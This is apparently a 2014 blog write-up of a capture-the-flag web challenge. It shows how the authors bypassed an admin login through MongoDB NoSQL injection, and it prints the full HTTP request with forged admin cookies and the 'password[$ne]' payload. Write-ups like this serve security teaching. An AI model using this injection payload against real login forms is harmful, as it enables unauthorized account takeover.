Monday, May 12, 2014

Hacktrick 2014 - ORION - Web Write-up

on this challenge we were supposed to login as admin to a page, which we can register and login with our registered credentials. first we looked for guessable sessionid, but it was not :(. Then tried setting some cookies as admin, isadmin. It did not work neither. Then we get a hint that the server was using mongodb after that everything was easy we just make a nosqli request and became admin. To guess the username we used the registration system. The request made by netcat was this:

POST /index.php HTTP/1.1
Host: 80.251.47.26
Connection: keep-alive
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://80.251.47.26
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://80.251.47.26/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: admin=true; isadmin=true; PHPSESSID=123 
login=admin&password[$ne]=huhu&submit=

after that we just refreshed the page :)

No comments:

Post a Comment